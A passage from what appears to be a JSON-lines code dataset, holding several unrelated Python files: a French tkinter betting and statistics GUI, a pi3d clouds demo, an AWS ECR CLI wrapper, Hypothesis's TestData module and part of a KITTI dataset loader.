20)\r\n self.labelMiseAT.grid(row=3, column=4,padx=0,pady=0)\r\n #entry mise AT\r\n self.miseAT = ttk.Entry(self.master)\r\n self.miseAT.grid(row=4, column=4,padx=5,pady=5)\r\n\r\n #label cote\r\n self.labelOdd = ttk.Label(self.master, text=\"cote\",width = 20)\r\n self.labelOdd.grid(row=5, column=2,padx=0,pady=0)\r\n #entry cote\r\n self.Odd = ttk.Entry(self.master)\r\n self.Odd.grid(row=6, column=2,padx=5,pady=5)\r\n\r\n #label type paris\r\n self.labelTypeparis = ttk.Label(self.master, text=\"Type paris\",width = 20)\r\n self.labelTypeparis.grid(row=7, column=2,padx=0,pady=0)\r\n #entry type paris\r\n self.typeparis = ttk.Entry(self.master)\r\n self.typeparis.grid(row=8, column=2,padx=5,pady=5)\r\n self.typeparis.insert(tk.END,2)\r\n\r\n #bouton paris\r\n self.BoutonParis = ttk.Button(self.master,width = 20, text= 'ajoute paris',\r\n command = lambda: self.ajout_paris())\r\n self.BoutonParis.grid(row=9, column=2,padx=5,pady=5)\r\n\r\n #bouton VL\r\n self.BoutonVL = ttk.Button(self.master,width = 20,text= 'ajoute VL',\r\n command = lambda : self.thread_parallele(self.calcul_vl()))\r\n self.BoutonVL.grid(row=9, column=4,padx=5,pady=5)\r\n\r\n\r\n #label dateParis\r\n self.labeldateParis = ttk.Label(self.master, text=\"Date paris\",width = 20)\r\n self.labeldateParis.grid(row=6, column=0,padx=0,pady=0)\r\n #entry date Paris\r\n self.dateParis = ttk.Entry(self.master,width = 30)\r\n self.dateParis.grid(row=7, column=0,padx=5,pady=5)\r\n #aujourd hui\r\n self.dateParis.insert(tk.END,datetime.datetime.today())\r\n\r\n\r\n def creation_widgets_2(self):\r\n \"\"\"Création d'un spin bouton central \"\"\"\r\n\r\n #creation d'un cadre pour les spin\r\n self.cadreSpin_2 = tk.Frame(self.master)\r\n self.cadreSpin_2.grid(row=4, column=1, padx=10,pady=10)\r\n #Création du spin bouton de gauche\r\n self.SpinGauche_2 = tk.Button(self.cadreSpin_2, image=self.tk_flechegauche_2,width = 15, height=20)\r\n self.SpinGauche_2.pack(side='left')\r\n #Création du spin bouton de droite\r\n self.SpinDroit_2 = 
tk.Button(self.cadreSpin_2, image=self.tk_flechedroite_2,width = 15, height=20)\r\n self.SpinDroit_2.pack(side='right')\r\n #création d'un cadre\r\n self.cadreGauche_2 = tk.Frame(self.master)\r\n self.cadreGauche_2.grid(row=4, column=0, padx=20,pady=0)\r\n self.cadreDroit_2 = tk.Frame(self.master)\r\n self.cadreDroit_2.grid(row=4, column=3, padx=20,pady=0)\r\n #création d'une scrollbar pour la liste de gauche\r\n self.scrollbarGauche_2 = tk.Scrollbar(self.cadreGauche_2,orient=\"vertical\")\r\n self.scrollbarGauche_2.pack(side='right',fill='y')\r\n #création d'une scrollbar pour la liste de droite\r\n self.scrollbarDroite_2 = tk.Scrollbar(self.cadreDroit_2,orient=\"vertical\")\r\n self.scrollbarDroite_2.pack(side='right',fill='y')\r\n #Création de la listBox de gauche\r\n self.listeGauche_2 = tk.Listbox(self.cadreGauche_2,width = 25, height=8,yscrollcommand=self.scrollbarGauche_2.set)\r\n self.listeGauche_2.pack()\r\n #Création de la listBox de droite\r\n self.listeDroite_2 = tk.Listbox(self.cadreDroit_2,width = 25, height=8,yscrollcommand=self.scrollbarDroite_2.set)\r\n self.listeDroite_2.pack()\r\n #nom de la liSte de gauche\r\n self.Label_listeGauche_2 = tk.Label(self.master, text=\"Saisons dans la base\")\r\n self.Label_listeGauche_2.grid(row=3, column=0, padx=20,pady=5,sticky ='sw')\r\n #nom de la liste de droite\r\n self.Label_listeDroite_2 = tk.Label(self.master, text=\"Saisons sélectionnées\")\r\n self.Label_listeDroite_2.grid(row=3, column=3, padx=20,pady=5,sticky ='sw')\r\n # attache listbox à scrollbar à gauche\r\n self.scrollbarGauche_2.config(command=self.listeGauche_2.yview)\r\n # attache listbox à scrollbar à droite\r\n self.scrollbarDroite_2.config(command=self.listeDroite_2.yview)\r\n\r\n def creation_widgets(self):\r\n \"\"\"Création d'un spin bouton central \"\"\"\r\n\r\n #creation d'un cadre pour les spin\r\n self.cadreSpin = tk.Frame(self.master)\r\n self.cadreSpin.grid(row=2, column=1, padx=10,pady=10)\r\n #Création du spin bouton de gauche\r\n self.SpinGauche = tk.Button(self.cadreSpin, image=self.tk_flechegauche,width = 15, height=20)\r\n self.SpinGauche.pack(side='left')\r\n #Création du spin bouton de droite\r\n self.SpinDroit = tk.Button(self.cadreSpin, image=self.tk_flechedroite,width = 15, height=20)\r\n self.SpinDroit.pack(side='right')\r\n #création d'un cadre\r\n self.cadreGauche = tk.Frame(self.master)\r\n self.cadreGauche.grid(row=2, column=0, padx=20,pady=0)\r\n self.cadreDroit = tk.Frame(self.master)\r\n self.cadreDroit.grid(row=2, column=3, padx=20,pady=0)\r\n #création d'une scrollbar pour la liste de gauche\r\n self.scrollbarGauche = tk.Scrollbar(self.cadreGauche,orient=\"vertical\")\r\n self.scrollbarGauche.pack(side='right',fill='y')\r\n #création d'une scrollbar pour la liste de droite\r\n self.scrollbarDroite = tk.Scrollbar(self.cadreDroit,orient=\"vertical\")\r\n self.scrollbarDroite.pack(side='right',fill='y')\r\n #Création de la listBox de gauche\r\n self.listeGauche = tk.Listbox(self.cadreGauche,width = 25, height=8,yscrollcommand=self.scrollbarGauche.set)\r\n self.listeGauche.pack()\r\n #Création de la listBox de droite\r\n self.listeDroite = tk.Listbox(self.cadreDroit,width = 25, height=8,yscrollcommand=self.scrollbarDroite.set)\r\n self.listeDroite.pack()\r\n #bar de progression\r\n #self.progress=ttk.Progressbar(self.master, length=500)\r\n #self.progress.grid(row=6, column=0, padx=10,pady=10, columnspan =4)\r\n #nom de la liSte de gauche\r\n self.Label_listeGauche = tk.Label(self.master, text=\"Championnats dans la base\")\r\n 
self.Label_listeGauche.grid(row=1, column=0, padx=20,pady=5,sticky ='sw')\r\n #nom de la liste de droite\r\n self.Label_listeDroite = tk.Label(self.master, text=\"Championnats sélectionnés\")\r\n self.Label_listeDroite.grid(row=1, column=3, padx=20,pady=5,sticky ='sw')\r\n # attache listbox à scrollbar à gauche\r\n self.scrollbarGauche.config(command=self.listeGauche.yview)\r\n # attache listbox à scrollbar à droite\r\n self.scrollbarDroite.config(command=self.listeDroite.yview)\r\n\r\n\r\n def liste_personne(self):\r\n \"\"\"récupère la liste des personnes dans la base\"\"\"\r\n rows = self.cl.liste_personnes()\r\n return rows\r\n\r\n\r\n def liste_saison(self):\r\n \"\"\"liste saisons dans la table résultats \"\"\"\r\n rows = self.cl.liste_saisons()\r\n return rows\r\n def liste_champ(self):\r\n \"\"\"liste des championnats dans la table de mapping \"\"\"\r\n rows = self.cl.liste_championnats()\r\n return rows\r\n def liste_fonds_transpa(self):\r\n \"\"\"récupère la liste des fonds pour la transparisation \"\"\"\r\n #liste des isin et noms de portefeuilles dans le resinv et ampère\r\n rows = self.cl.fonds_tansparisation\r\n return rows\r\n\r\n def ajoute_item_liste_droite(self,champ):\r\n \"\"\"ajoute les fonds à la liste de droite\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche.delete(0,'end')\r\n #efface la listebox de gauche\r\n self.listeDroite.delete(0,'end')\r\n #boucle sur le résultat\r\n for i, r in enumerate(champ):\r\n self.listeDroite.insert(i+1,str(r[0]) + ' - ' + str(r[1]))\r\n\r\n def ajoute_item_liste_droite_2(self,saison):\r\n \"\"\"ajoute les fonds à la liste de droite\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche_2.delete(0,'end')\r\n #efface la listebox de gauche\r\n self.listeDroite_2.delete(0,'end')\r\n #boucle sur le résultat\r\n for i, r in enumerate(saison):\r\n self.listeDroite_2.insert(i+1,str(r[0]))\r\n\r\n def ajoute_item_liste_gauche(self,champ):\r\n \"\"\"ajoute les fonds à la liste de gauche\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche.delete(0,'end')\r\n #efface la listebox de droite\r\n self.listeDroite.delete(0,'end')\r\n #liste des isin et noms de portefeuilles dans la abse pilote ampere\r\n #boucle sur le résultat\r\n for i, r in enumerate(champ):\r\n self.listeGauche.insert(i+1,str(r[0]) + ' - ' + str(r[1]))\r\n\r\n def ajoute_item_liste_gauche_2(self,saison):\r\n \"\"\"ajoute les fonds à la liste de gauche\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche_2.delete(0,'end')\r\n #efface la listebox de droite\r\n self.listeDroite_2.delete(0,'end')\r\n #liste des isin et noms de portefeuilles dans la abse pilote ampere\r\n #boucle sur le résultat\r\n for i, r in enumerate(saison):\r\n self.listeGauche_2.insert(i+1,str(r[0]))\r\n\r\n\r\n def ajoute_item_Droite_Gauche_2(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeDroite_2.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_droite= self.listeDroite_2.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de gauche\r\n for i in range(0,self.listeGauche_2.size()):\r\n if nom_element_droite < self.listeGauche_2.get(i):\r\n #ajoute l'element dans la liste de gauche\r\n self.listeGauche_2.insert(i,nom_element_droite)\r\n #flag true\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n 
self.listeGauche_2.insert(self.listeGauche_2.size(),nom_element_droite)\r\n #supprime l'élément dans la listBox de droite\r\n self.listeDroite_2.delete(index)\r\n bol = False\r\n\r\n def ajoute_item_Gauche_Droite_2(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeGauche_2.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_gauche = self.listeGauche_2.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de droite\r\n for i in range(0,self.listeDroite_2.size()):\r\n #si le nom est plus petit\r\n if nom_element_gauche < self.listeDroite_2.get(i):\r\n #ajoute l'element dans la liste de droite\r\n self.listeDroite_2.insert(i,nom_element_gauche)\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeDroite_2.insert(self.listeDroite_2.size(),nom_element_gauche)\r\n #supprime l'élément dans la listBox de gauche\r\n self.listeGauche_2.delete(index)\r\n bol = False\r\n\r\n def ajoute_item_Droite_Gauche(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeDroite.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_droite= self.listeDroite.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de gauche\r\n for i in range(0,self.listeGauche.size()):\r\n if nom_element_droite < self.listeGauche.get(i):\r\n #ajoute l'element dans la liste de gauche\r\n self.listeGauche.insert(i,nom_element_droite)\r\n #flag true\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeGauche.insert(self.listeGauche.size(),nom_element_droite)\r\n #supprime l'élément dans la listBox de droite\r\n self.listeDroite.delete(index)\r\n bol = False\r\n\r\n def ajoute_item_Gauche_Droite(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeGauche.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_gauche = self.listeGauche.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de droite\r\n for i in range(0,self.listeDroite.size()):\r\n #si le nom est plus petit\r\n if nom_element_gauche < self.listeDroite.get(i):\r\n #ajoute l'element dans la liste de droite\r\n self.listeDroite.insert(i,nom_element_gauche)\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeDroite.insert(self.listeDroite.size(),nom_element_gauche)\r\n #supprime l'élément dans la listBox de gauche\r\n self.listeGauche.delete(index)\r\n bol = False\r\n \r\n\r\n def activate_desactivate(self,statut):\r\n \"\"\"active ou désactive les widgets \"\"\"\r\n for child in self.master.winfo_children():\r\n if str(child) != '.!menu':\r\n try:\r\n child.configure(state=statut)\r\n except:\r\n pass\r\n\r\n def calcul_stats_2(self):\r\n \"\"\"calcul les statistiques de la période\"\"\"\r\n #désactive les widgets\r\n self.activate_desactivate('disabled')\r\n #création d'une liste de championnat\r\n liste_champ = []\r\n liste_saison = []\r\n #saison\r\n nombre_saison = self.listeDroite_2.size()\r\n #si on n 'a pas choisi une saison\r\n if nombre_saison 
== 0:\r\n messagebox.showerror('Erreur','Veuillez sélectionner des saisons')\r\n else:\r\n #nombre de fonds sélectionnés\r\n nombre_champ = self.listeDroite.size()\r\n #si on n'a pas sélectionné de fonds\r\n if nombre_champ ==0:\r\n #message d'erreur\r\n messagebox.showerror('Erreur','Veuillez sélectionner des championnats')\r\n else:\r\n #ajoute les championnats dans une boucle\r\n for c in range(0,nombre_champ):\r\n liste_champ.append(self.listeDroite.get(c)[-2:])\r\n #ajoute les championnats dans une boucle\r\n for c in range(0,nombre_saison):\r\n liste_saison.append(self.listeDroite_2.get(c))\r\n #importation des championnats\r\n try:\r\n stats.stats_2(liste_champ,liste_saison)\r\n #Fonds transparisé avec succès\r\n messagebox.showinfo('Succès', 'statistiques calculées avec succès')\r\n except Exception as e:\r\n messagebox.showerror('Erreur',str(e))\r\n\r\n #active les widgets\r\n self.activate_desactivate('normal')\r\n\r\n def ajoute_resultats(self):\r\n \"\"\"ajoute le resultat des championnats sélectionnés \"\"\"\r\n #désactive les widgets\r\n self.activate_desactivate('disabled')\r\n #création d'une liste de championnat\r\n liste_champ = []\r\n #saison\r\n saison = self.TextBox_saison.get()\r\n #si on n 'a pas choisi une saison\r\n if saison == '':\r\n messagebox.showerror('Erreur','Veuillez saisir une saison')\r\n else:\r\n liste_saison = [saison]\r\n #nombre de fonds sélectionnés\r\n nombre_champ = self.listeDroite.size()\r\n #si on n'a pas sélectionné de fonds\r\n if nombre_champ ==0:\r\n #message d'erreur\r\n messagebox.showerror('Erreur','Veuillez sélectionner des fonds')\r\n else:\r\n #ajoute les championnats dans une boucle\r\n for c in range(0,nombre_champ):\r\n liste_champ.append(self.listeDroite.get(c)[-2:])\r\n #importation des championnats\r\n try:\r\n import_results.ajoute_data(liste_champ,liste_saison)\r\n #Fonds transparisé avec succès\r\n messagebox.showinfo('Succès', 'Résultats insérés avec succès')\r\n except Exception as e:\r\n messagebox.showerror('Erreur',str(e))\r\n\r\n\r\n #active les widgets\r\n self.activate_desactivate('normal')\r\n\r\n def thread_parallele(self, procedure):\r\n \"\"\"lance le reporting dans un thread parallèle\"\"\"\r\n self.thread=threading.Thread(name='Thread_parallele',target=procedure)\r\n self.thread.start()\r\n\r\nif __name__ == '__main__':\r\n fenetre = tk.Tk()\r\n fenetre.title('Gestionnaire')\r\n\r\n cla = class_gestionnaire(fenetre)\r\n fenetre.mainloop()\r\n\r\n del cla\r\n","sub_path":"userform.py","file_name":"userform.py","file_ext":"py","file_size_in_byte":33838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355988180","text":"\n\nfrom xai.brain.wordbase.nouns._stimulus import _STIMULUS\n\n#calss header\nclass _STIMULI(_STIMULUS, ):\n\tdef __init__(self,): \n\t\t_STIMULUS.__init__(self)\n\t\tself.name = \"STIMULI\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"stimulus\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_stimuli.py","file_name":"_stimuli.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"419322719","text":"# Clouds 3D example using pi3d module\n# ===================================\n# Copyright (c) 2012 - Tim Skillman\n# \n# This example does not reflect the finished pi3d module in any way whatsoever!\n# It merely aims to demonstrate a working concept in simplfying 3D programming on the Pi\n#\n# PLEASE INSTALL PIL imaging with:\n#\n# $ 
sudo apt-get install python-imaging\n#\n# before running this example\n#\n# This demo needs some sorting out - the alpha's are blending with desktop\n# Solutions welcome!\n\nimport pi3d, random, time\n\nz=0\nx=0\nspeed=1\nwidex=60\nwidey = 8\ncloudno = 50\ncloud_depth = 60.0\nzd = cloud_depth / cloudno\n\ndef drawCloud(c, xx,zz):\n    zzz=(zz+c[2]) % cloud_depth\n    xxx=(xx+c[0])\n    pi3d.sprite(clouds[c[3]], xxx,c[1],-zzz,8,5)\n\n# Setup display and initialise pi3d\nscnx = 800\nscny = 600\ndisplay = pi3d.glDisplay()\ndisplay.create(100,100,scnx,scny)\ndisplay.setBackColour(0,0.7,1,1)\n\nclouds = []\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud2.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud3.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud4.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud5.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud6.png\"))\n\n# Setup cloud positions and cloud image refs\nz = 0.0\ncxyz = []\nfor b in range (0, cloudno):\n\tcxyz.append((random.random() * widex - widex*.5, -random.random() * widey, cloud_depth-z, int(random.random() * 4) + 1))\n\tz = z + zd #(z+random.random() * 100) % 1000\n\nzc = 0\n\n# Fetch key presses\nmykeys = pi3d.key()\n\nwhile True:\n\n\tdisplay.clear()\n\n\tz = (z+(cloud_depth-speed)) % cloud_depth\t#zc = int((z/1000) * cloudno)\n\tzc = (zc + (cloudno-1)) % cloudno\n\n\t#attempts to resolve z-sorting of clouds\n\tfor d in range (zc, cloudno):\n\t\tdrawCloud(cxyz[d],x,z)\n\n\tfor d in range (0, zc):\n\t\tdrawCloud(cxyz[d],x,z)\n\n\t#Press ENTER to terminate\n\tif mykeys.read() == 10:\n\t\tdisplay.destroy()\n\t\tbreak\n\n\tdisplay.swap_buffers()\n\ttime.sleep(0.01)\n","sub_path":"clouds3d.py","file_name":"clouds3d.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"24338334","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ecr/batch-check-layer-availability.html\nif __name__ == '__main__':\n    \"\"\"\n\n    \"\"\"\n\n    parameter_display_string = \"\"\"\n    # repository-name : The name of the repository that is associated with the image layers to check.\n    # layer-digests : The digests of the image layers to check.\n(string)\n    \"\"\"\n    add_option_dict = {}\n    add_option_dict[\"parameter_display_string\"] = parameter_display_string\n    # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n    write_two_parameter(\"ecr\", \"batch-check-layer-availability\", \"repository-name\", \"layer-digests\", add_option_dict)\n","sub_path":"ecr_write_2/check-layer-availability_batch.py","file_name":"check-layer-availability_batch.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"266012699","text":"# coding=utf-8\n#\n# This file is part of Hypothesis (https://github.com/DRMacIver/hypothesis)\n#\n# Most of this work is copyright (C) 2013-2015 David R. MacIver\n# (david@drmaciver.com), but it contains contributions by others. 
See\n# https://github.com/DRMacIver/hypothesis/blob/master/CONTRIBUTING.rst for a\n# full list of people who may hold copyright, and consult the git log if you\n# need to determine who owns an individual contribution.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public License,\n# v. 2.0. If a copy of the MPL was not distributed with this file, You can\n# obtain one at http://mozilla.org/MPL/2.0/.\n#\n# END HEADER\n\nfrom __future__ import division, print_function, absolute_import\n\nfrom enum import IntEnum\n\nfrom hypothesis.errors import Frozen, InvalidArgument\nfrom hypothesis.internal.compat import hbytes, text_type, int_to_bytes, \\\n unicode_safe_repr, reasonable_byte_type\n\n\ndef uniform(random, n):\n return int_to_bytes(random.getrandbits(n * 8), n)\n\n\nclass Status(IntEnum):\n OVERRUN = 0\n INVALID = 1\n VALID = 2\n INTERESTING = 3\n\n\nclass StopTest(BaseException):\n\n def __init__(self, testcounter):\n super(StopTest, self).__init__(repr(testcounter))\n self.testcounter = testcounter\n\nglobal_test_counter = 0\n\n\nclass TestData(object):\n\n @classmethod\n def for_buffer(self, buffer):\n return TestData(\n max_length=len(buffer),\n draw_bytes=lambda data, n, distribution:\n buffer[data.index:data.index + n]\n )\n\n def __init__(self, max_length, draw_bytes):\n self.max_length = max_length\n self.is_find = False\n self._draw_bytes = draw_bytes\n self.overdraw = 0\n self.level = 0\n self.block_starts = {}\n self.blocks = []\n self.buffer = bytearray()\n self.output = u''\n self.status = Status.VALID\n self.frozen = False\n self.intervals_by_level = []\n self.intervals = []\n self.interval_stack = []\n global global_test_counter\n self.testcounter = global_test_counter\n global_test_counter += 1\n\n def __assert_not_frozen(self, name):\n if self.frozen:\n raise Frozen(\n 'Cannot call %s on frozen TestData' % (\n name,))\n\n @property\n def index(self):\n return len(self.buffer)\n\n def note(self, value):\n self.__assert_not_frozen('note')\n if not isinstance(value, text_type):\n value = unicode_safe_repr(value)\n self.output += value\n\n def draw(self, strategy):\n if self.is_find and not strategy.supports_find:\n raise InvalidArgument((\n 'Cannot use strategy %r within a call to find (presumably '\n 'because it would be invalid after the call had ended).'\n ) % (strategy,))\n self.start_example()\n try:\n return strategy.do_draw(self)\n finally:\n if not self.frozen:\n self.stop_example()\n\n def start_example(self):\n self.__assert_not_frozen('start_example')\n self.interval_stack.append(self.index)\n self.level += 1\n\n def stop_example(self):\n self.__assert_not_frozen('stop_example')\n self.level -= 1\n while self.level >= len(self.intervals_by_level):\n self.intervals_by_level.append([])\n k = self.interval_stack.pop()\n if k != self.index:\n t = (k, self.index)\n self.intervals_by_level[self.level].append(t)\n if not self.intervals or self.intervals[-1] != t:\n self.intervals.append(t)\n\n def freeze(self):\n if self.frozen:\n assert isinstance(self.buffer, hbytes)\n return\n self.frozen = True\n # Intervals are sorted as longest first, then by interval start.\n for l in self.intervals_by_level:\n for i in range(len(l) - 1):\n if l[i][1] == l[i + 1][0]:\n self.intervals.append((l[i][0], l[i + 1][1]))\n self.intervals = sorted(\n set(self.intervals),\n key=lambda se: (se[0] - se[1], se[0])\n )\n self.buffer = hbytes(self.buffer)\n del self._draw_bytes\n\n def draw_bytes(self, n, distribution=uniform):\n if n == 0:\n return hbytes(b'')\n 
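# (added note) the bookkeeping below records the n bytes drawn here as one block in\n        # block_starts/blocks/intervals, presumably so later minimization can treat them as a unit\n        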
self.__assert_not_frozen('draw_bytes')\n initial = self.index\n if self.index + n > self.max_length:\n self.overdraw = self.index + n - self.max_length\n self.status = Status.OVERRUN\n self.freeze()\n raise StopTest(self.testcounter)\n result = self._draw_bytes(self, n, distribution)\n self.block_starts.setdefault(n, []).append(initial)\n self.blocks.append((initial, initial + n))\n assert len(result) == n\n assert self.index == initial\n self.buffer.extend(result)\n self.intervals.append((initial, self.index))\n return reasonable_byte_type(result)\n\n def mark_interesting(self):\n self.__assert_not_frozen('mark_interesting')\n self.status = Status.INTERESTING\n self.freeze()\n raise StopTest(self.testcounter)\n\n def mark_invalid(self):\n self.__assert_not_frozen('mark_invalid')\n self.status = Status.INVALID\n self.freeze()\n raise StopTest(self.testcounter)\n","sub_path":"tsampi/pypy/lib_python-bak/hypothesis/internal/conjecture/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494436119","text":"import random\nkeep_going = True\nwhile keep_going:\n\n dice =[0,0,0,0,0]\n \n for i in range(5):\n\n dice[i] = random.randint(1,6)\n print(\"вам выпало:\",dice)\n if dice[0] == dice[4]:\n print(\"яцзы\")\n elif (dice[0]==dice[3]) or (dice[1]==dice[4]):\n print(\"четыре одинаковых\")\n \n elif(dice[0]==dice[2]) or (dice[1]==dice[3]) or (dice[2]==dice[4]):\n print(\"три одинаковые\")\n\n keep_going=(input(\"нажмите enter для продолжения,любую клавишу чтобы выйти:\")==\"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"PythonApps/PythonApps/Task 12.py","file_name":"Task 12.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"277622955","text":"from pymongo import MongoClient\nimport hashlib\nimport uuid\n\n\ndef find_session(email):\n client = MongoClient(\"mongodb://localhost:27017\")\n db = client.myinstagram\n\n current_session = db.sessions.find_one({'email': email})\n\n if current_session is None:\n return {\"found\": False}\n else:\n return {\"found\": True, 'username': current_session['username'], 'session_id': current_session['session_id']}\n\n\ndef new_session(username, email):\n client = MongoClient(\"mongodb://localhost:27017\")\n db = client.myinstagram\n\n salt = uuid.uuid4().hex\n session_id = hashlib.sha256(salt.encode()).hexdigest()\n\n db.sessions.insert(\n {\n 'email': email,\n 'username': username,\n 'session_id': session_id\n }\n )\n\n return session_id\n\n\ndef remove_session(email):\n client = MongoClient(\"mongodb://localhost:27017\")\n db = client.myinstagram\n db.sessions.delete_many({'email': email})\n","sub_path":"accounter/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223290862","text":"# encoding: utf-8\n# module pango\n# from /usr/lib/python2.7/dist-packages/gtk-2.0/pango.so\n# by generator 1.135\n# no doc\n\n# imports\nimport gobject as __gobject\nimport gobject._gobject as __gobject__gobject\n\n\nclass Weight(__gobject.GEnum):\n # no doc\n def __init__(self, *args, **kwargs): # real signature unknown\n pass\n\n __weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n \"\"\"list of weak references to the object (if defined)\"\"\"\n\n\n __dict__ = 
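The session.py record above exposes three MongoDB-backed helpers: find_session, new_session, and remove_session. The token it issues is just a SHA-256 hash of a random UUID salt, so it encodes nothing about the user; the lookup key is the e-mail address. A hedged login/logout round trip, assuming a local mongod and that the module is importable as session (the address and username below are placeholders):

from session import find_session, new_session, remove_session

email = "user@example.com"      # placeholder account
current = find_session(email)   # returns {'found': False} when no session exists

# Create a session only when none is active for this address.
session_id = current["session_id"] if current["found"] else new_session("some_user", email)
print("active session:", session_id)

remove_session(email)           # logout drops every session stored for the address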
None # (!) real value is ''\n __enum_values__ = {\n 100: 100,\n 200: 200,\n 300: 300,\n 380: 380,\n 400: 400,\n 500: 500,\n 600: 600,\n 700: 700,\n 800: 800,\n 900: 900,\n 1000: 1000,\n }\n __gtype__ = None # (!) real value is ''\n\n\n","sub_path":"intellij-community/system/python_stubs/-1247972723/pango/Weight.py","file_name":"Weight.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"319746977","text":"import os\nimport re\nimport h5py\nimport numpy as np\nimport torch.utils.data as data\nfrom PIL import Image\n\n\nclass KITTIDetection(data.Dataset):\n \"\"\"The KITTI Detection dataset.\n\n Args:\n root (string): Root directory of the KITTI dataset.\n split (string, optional): The dataset subset which can be either\n \"train\", \"val\", or \"test\". Default: ``\"train\"``.\n transforms (callable, optional): A function/transform that takes\n input sample and its target as entry and return a transformed\n version. Default: ``None``.\n rectified (bool, optional): If True, return the LiDAR point cloud\n in the camera rectified coordinate system. Default: ``True``.\n remove_dontcare (bool, optional): If True, remove DontCare label\n from the ground truth annotations. Default: ``True``.\n \"\"\"\n\n def __init__(\n self,\n root,\n split=\"train\",\n transforms=None,\n rectified=True,\n remove_dontcare=True,\n ):\n super(KITTIDetection, self).__init__()\n self.root = root\n self.split = split\n if split in [\"train\", \"val\"]:\n self.splitdir = \"training\"\n else:\n self.splitdir = \"testing\"\n self.transforms = transforms\n self.rectified = rectified\n self.remove_dontcare = remove_dontcare\n self.image_path = os.path.join(root, self.splitdir, \"image_2\")\n self.lidar_path = os.path.join(root, self.splitdir, \"velodyne\")\n self.label_path = os.path.join(root, self.splitdir, \"label_2\")\n self.calib_path = os.path.join(root, self.splitdir, \"calib\")\n\n if not self._check_integrity():\n raise RuntimeError(\"Dataset not found or corrupted.\")\n\n self.framelist = sorted(\n [\n int(x.split(\".\")[0])\n for x in os.listdir(self.lidar_path)\n if re.match(\"^[0-9]{6}.bin$\", x)\n ]\n )\n\n def _check_integrity(self):\n return (\n os.path.exists(self.image_path)\n and os.path.exists(self.calib_path)\n and os.path.exists(self.lidar_path)\n and (os.path.exists(self.label_path) if self.split == \"training\" else True)\n )\n\n def __len__(self):\n return len(self.framelist)\n\n def __getitem__(self, i):\n frameid = self.framelist[i]\n image = self._get_image(frameid)\n lidar = self._get_lidar(frameid)\n if self.rectified:\n calib = self._get_calib(frameid)\n lidar = self.rectify_lidar(lidar, calib)\n\n inputs = {\"image\": image, \"points\": lidar}\n target = None\n if self.split != \"test\":\n target = self._get_label(frameid)\n if self.transforms is not None:\n inputs, target = self.transforms(inputs, target)\n return inputs, target\n\n def _get_image(self, frameid):\n basename = \"{:06d}.png\".format(frameid)\n filename = os.path.join(self.image_path, basename)\n image = Image.open(filename)\n image = np.asarray(image, dtype=np.float32)\n return image\n\n def _get_lidar(self, frameid):\n basename = 